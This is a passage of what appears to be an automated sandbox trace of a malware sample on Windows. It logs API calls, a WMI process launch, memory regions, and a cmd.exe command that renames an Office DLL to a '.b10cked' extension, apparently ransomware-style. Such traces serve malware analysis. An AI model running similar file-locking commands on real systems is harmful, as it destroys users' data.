(lpString="") returned 0 [0173.624] lstrlenA (lpString="") returned 0 [0173.624] lstrlenW (lpString="Select * from Win32_Process") returned 27 [0173.624] wcstok (in: _String="Select * from Win32_Process", _Delimiter=" ", _Context=0x94f97568*=0x0 | out: _String="Select", _Context=0x94f97568*=0x0) returned="Select" [0173.624] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x94f97568*=0x0 | out: _String=0x0, _Context=0x94f97568*=0x0) returned="*" [0173.624] lstrlenW (lpString="FROM") returned 4 [0173.624] lstrlenW (lpString="*") returned 1 [0173.624] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0173.624] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x94f97568*=0x0 | out: _String=0x0, _Context=0x94f97568*=0x0) returned="from" [0173.625] lstrlenW (lpString="FROM") returned 4 [0173.625] lstrlenW (lpString="from") returned 4 [0173.625] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0173.625] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x94f97568*=0x0 | out: _String=0x0, _Context=0x94f97568*=0x0) returned="Win32_Process" [0173.625] ??0CHString@@QAE@XZ () returned 0xcf2d8 [0173.625] GetCurrentThreadId () returned 0xf7c [0173.625] LoadStringW (in: hInstance=0x0, uID=0xb7ea, lpBuffer=0xcea84, cchBufferMax=1024 | out: lpBuffer="Executing (%1)->%2()\r\n") returned 0x16 [0173.625] FormatMessageW (in: dwFlags=0x2500, lpSource=0xcea84, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0xcea80, nSize=0x0, Arguments=0xcea6c | out: lpBuffer="\xf1a0\x25\x45\x78\x65\x63\x75\x74\x69\x6e\x67\x20\x28\x25\x31\x29\x2d\x3e\x25\x32\x28\x29\x0d\x0a") returned 0x25 [0173.625] LocalFree (hMem=0x25f1a0) returned 0x0 [0173.625] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Executing (Win32_Process)->Create()\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0173.625] ??YCHString@@QAEABV0@PBG@Z () returned 0x8bc28c [0173.625] fprintf (in: _File=0x76b32920, _Format="%s" | out: _File=0x76b32920) returned 37 [0173.626] fflush (in: _File=0x76b32920 | out: _File=0x76b32920) returned 0 [0173.626] IWbemServices:ExecMethod (in: This=0x72d024, strObjectPath="Win32_Process", strMethodName="Create", lFlags=0, pCtx=0x0, pInParams=0x7410b0, ppOutParams=0xcf2f0*=0x0, ppCallResult=0x0 | out: ppOutParams=0xcf2f0*=0x72d478, ppCallResult=0x0) returned 0x0 [0177.829] LoadStringW (in: hInstance=0x0, uID=0xb3b3, lpBuffer=0x765bf0, cchBufferMax=1024 | out: lpBuffer="Method execution successful.\r\n") returned 0x1e [0177.829] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Method execution successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0177.829] ??YCHString@@QAEABV0@PBG@Z () returned 0x8bc28c [0177.829] fprintf (in: _File=0x76b32920, _Format="%s" | out: _File=0x76b32920) returned 30 [0177.829] fflush (in: _File=0x76b32920 | out: _File=0x76b32920) returned 0 [0177.829] IUnknown:AddRef (This=0x72d478) returned 0x2 [0177.830] ??0CHString@@QAE@XZ () returned 0xcf280 [0177.830] GetCurrentThreadId () returned 0xf7c [0177.885] IWbemClassObject:GetObjectText (in: This=0x72d478, lFlags=0, pstrObjectText=0xcf284 | out: pstrObjectText=0xcf284*="\ninstance of __PARAMETERS\n{\n\x09ProcessId = 2920;\n\x09ReturnValue = 0;\n};\n") returned 0x0 [0177.895] LoadStringW (in: hInstance=0x0, uID=0xb7f7, lpBuffer=0x765bf0, cchBufferMax=1024 | out: lpBuffer="Out Parameters:") returned 0xf [0177.895] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Out Parameters:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0177.895] ??YCHString@@QAEABV0@PBG@Z () returned 0x8bc28c [0177.895] fprintf (in: _File=0x76b32920, _Format="%s" | out: _File=0x76b32920) returned 15 [0177.895] fflush (in: _File=0x76b32920 | out: _File=0x76b32920) returned 0 [0177.895] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\ninstance of __PARAMETERS\n{\n\x09ProcessId = 2920;\n\x09ReturnValue = 0;\n};\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 69 [0177.895] ??YCHString@@QAEABV0@PBG@Z () returned 0x8bc28c [0177.895] fprintf (in: _File=0x76b32920, _Format="%s" | out: _File=0x76b32920) returned 68 [0177.896] fflush (in: _File=0x76b32920 | out: _File=0x76b32920) returned 0 [0177.896] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0177.896] ??YCHString@@QAEABV0@PBG@Z () returned 0x8bc28c [0177.896] fprintf (in: _File=0x76b32940, _Format="%s" | out: _File=0x76b32940) returned 1 [0177.897] fflush (in: _File=0x76b32940 | out: _File=0x76b32940) returned 0 [0177.897] ??1CHString@@QAE@XZ () returned 0x6f950504 [0177.897] IUnknown:Release (This=0x72d478) returned 0x1 [0177.897] ??1CHString@@QAE@XZ () returned 0x6f950504 [0177.897] ??1CHString@@QAE@XZ () returned 0x6f950504 [0177.897] ??1CHString@@QAE@XZ () returned 0x6f950504 [0177.897] GetCurrentThreadId () returned 0xf7c [0177.897] ??0CHString@@QAE@PBG@Z () returned 0xcfd1c [0177.897] ??YCHString@@QAEABV0@PBG@Z () returned 0xcfd1c [0177.897] lstrlenW (lpString="LIST") returned 4 [0177.897] lstrlenW (lpString="call") returned 4 [0177.897] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0177.897] lstrlenW (lpString="ASSOC") returned 5 [0177.897] lstrlenW (lpString="call") returned 4 [0177.897] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0177.897] lstrlenW (lpString="GET") returned 3 [0177.897] lstrlenW (lpString="call") returned 4 [0177.897] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0177.897] ??1CHString@@QAE@XZ () returned 0x1 [0177.897] WbemLocator:IUnknown:Release (This=0x72d024) returned 0x0 [0177.931] ?Empty@CHString@@QAEXXZ () returned 0x6f950510 [0177.974] _kbhit () returned 0x0 [0178.105] IUnknown:Release (This=0x72d478) returned 0x0 [0178.105] ?Empty@CHString@@QAEXXZ () returned 0x6f950504 [0178.106] WbemLocator:IUnknown:Release (This=0x720828) returned 0x2 [0178.106] WbemLocator:IUnknown:Release (This=0x72c7cc) returned 0x0 [0178.230] WbemLocator:IUnknown:Release (This=0x72c74c) returned 0x0 [0178.230] WbemLocator:IUnknown:Release (This=0x720828) returned 0x1 [0178.230] ?Empty@CHString@@QAEXXZ () returned 0x6f950504 [0178.230] WbemLocator:IUnknown:Release (This=0x720828) returned 0x0 [0178.232] CoUninitialize () [0178.401] exit (_Code=0) [0178.401] ??1CHString@@QAE@XZ () returned 0x6f950504 [0178.401] ??1CHString@@QAE@XZ () returned 0x6f950504 Thread: id = 336 os_tid = 0xe18 Thread: id = 355 os_tid = 0x934 Thread: id = 357 os_tid = 0x4e4 Thread: id = 358 os_tid = 0xffc Thread: id = 359 os_tid = 0x53c Process: id = "272" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166c0" os_pid = "0xedc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22095 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22096 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22097 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22098 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 22099 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22100 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22101 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22102 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22103 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 22104 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22132 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22133 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22134 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22135 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 22136 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 22137 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22138 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22139 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22140 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22141 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22142 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22143 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22144 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22145 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22146 start_va = 0x1e0000 end_va = 0x2a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 22147 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22148 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22149 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 22150 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 22151 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 22152 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 22153 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 22154 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 22155 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Thread: id = 335 os_tid = 0xe14 [0160.379] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f9c4 | out: lpSystemTimeAsFileTime=0x16f9c4*(dwLowDateTime=0x9961b8a0, dwHighDateTime=0x1d440a9)) [0160.379] GetCurrentProcessId () returned 0xedc [0160.379] GetCurrentThreadId () returned 0xe14 [0160.379] GetTickCount () returned 0x30e71 [0160.379] QueryPerformanceCounter (in: lpPerformanceCount=0x16f9bc | out: lpPerformanceCount=0x16f9bc*=21716799183) returned 1 [0160.380] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0160.380] __set_app_type (_Type=0x1) [0160.380] __p__fmode () returned 0x76b331f4 [0160.380] __p__commode () returned 0x76b331fc [0160.380] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0160.380] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0160.380] GetCurrentThreadId () returned 0xe14 [0160.380] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe14) returned 0x38 [0160.380] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0160.380] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0160.380] SetThreadUILanguage (LangId=0x0) returned 0x409 [0160.381] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0160.381] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16f954 | out: phkResult=0x16f954*=0x0) returned 0x2 [0160.381] VirtualQuery (in: lpAddress=0x16f98b, lpBuffer=0x16f924, dwLength=0x1c | out: lpBuffer=0x16f924*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.381] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f924, dwLength=0x1c | out: lpBuffer=0x16f924*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0160.381] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f924, dwLength=0x1c | out: lpBuffer=0x16f924*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0160.381] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16f924, dwLength=0x1c | out: lpBuffer=0x16f924*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.381] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f924, dwLength=0x1c | out: lpBuffer=0x16f924*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0160.381] GetConsoleOutputCP () returned 0x1b5 [0160.381] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0160.381] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0160.381] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.381] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0160.382] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.382] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0160.382] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.382] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0160.382] _get_osfhandle (_FileHandle=0) returned 0x3 [0160.382] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0160.382] _get_osfhandle (_FileHandle=0) returned 0x3 [0160.382] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0160.383] GetEnvironmentStringsW () returned 0x320210* [0160.383] FreeEnvironmentStringsW (penv=0x320210) returned 1 [0160.383] GetEnvironmentStringsW () returned 0x320210* [0160.383] FreeEnvironmentStringsW (penv=0x320210) returned 1 [0160.383] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e8c4 | out: phkResult=0x16e8c4*=0x40) returned 0x0 [0160.383] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x0, lpData=0x16e8d0*=0xa0, lpcbData=0x16e8c8*=0x1000) returned 0x2 [0160.383] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x4, lpData=0x16e8d0*=0x1, lpcbData=0x16e8c8*=0x4) returned 0x0 [0160.383] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x0, lpData=0x16e8d0*=0x1, lpcbData=0x16e8c8*=0x1000) returned 0x2 [0160.383] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x4, lpData=0x16e8d0*=0x0, lpcbData=0x16e8c8*=0x4) returned 0x0 [0160.383] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x4, lpData=0x16e8d0*=0x40, lpcbData=0x16e8c8*=0x4) returned 0x0 [0160.384] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x4, lpData=0x16e8d0*=0x40, lpcbData=0x16e8c8*=0x4) returned 0x0 [0160.384] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x0, lpData=0x16e8d0*=0x40, lpcbData=0x16e8c8*=0x1000) returned 0x2 [0160.384] RegCloseKey (hKey=0x40) returned 0x0 [0160.384] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e8c4 | out: phkResult=0x16e8c4*=0x40) returned 0x0 [0160.384] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x0, lpData=0x16e8d0*=0x40, lpcbData=0x16e8c8*=0x1000) returned 0x2 [0160.384] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x4, lpData=0x16e8d0*=0x1, lpcbData=0x16e8c8*=0x4) returned 0x0 [0160.384] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x0, lpData=0x16e8d0*=0x1, lpcbData=0x16e8c8*=0x1000) returned 0x2 [0160.384] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x4, lpData=0x16e8d0*=0x0, lpcbData=0x16e8c8*=0x4) returned 0x0 [0160.384] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x4, lpData=0x16e8d0*=0x9, lpcbData=0x16e8c8*=0x4) returned 0x0 [0160.384] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x4, lpData=0x16e8d0*=0x9, lpcbData=0x16e8c8*=0x4) returned 0x0 [0160.384] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e8cc, lpData=0x16e8d0, lpcbData=0x16e8c8*=0x1000 | out: lpType=0x16e8cc*=0x0, lpData=0x16e8d0*=0x9, lpcbData=0x16e8c8*=0x1000) returned 0x2 [0160.384] RegCloseKey (hKey=0x40) returned 0x0 [0160.384] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886382 [0160.384] srand (_Seed=0x5b886382) [0160.384] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked\"" [0160.384] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked\"" [0160.385] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0160.385] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x321970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0160.385] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0160.385] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0160.385] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0160.385] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0160.385] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0160.385] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0160.385] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0160.385] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0160.386] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0160.386] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0160.386] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0160.386] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0160.386] GetEnvironmentStringsW () returned 0x322360* [0160.386] FreeEnvironmentStringsW (penv=0x322360) returned 1 [0160.386] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.386] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0160.386] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0160.386] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0160.386] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0160.386] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0160.386] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0160.386] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0160.386] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0160.386] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0160.387] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f690 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0160.387] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f690, lpFilePart=0x16f68c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f68c*="Desktop") returned 0x18 [0160.387] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0160.387] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f40c | out: lpFindFileData=0x16f40c) returned 0x3209f0 [0160.387] FindClose (in: hFindFile=0x3209f0 | out: hFindFile=0x3209f0) returned 1 [0160.387] FindFirstFileW (in: 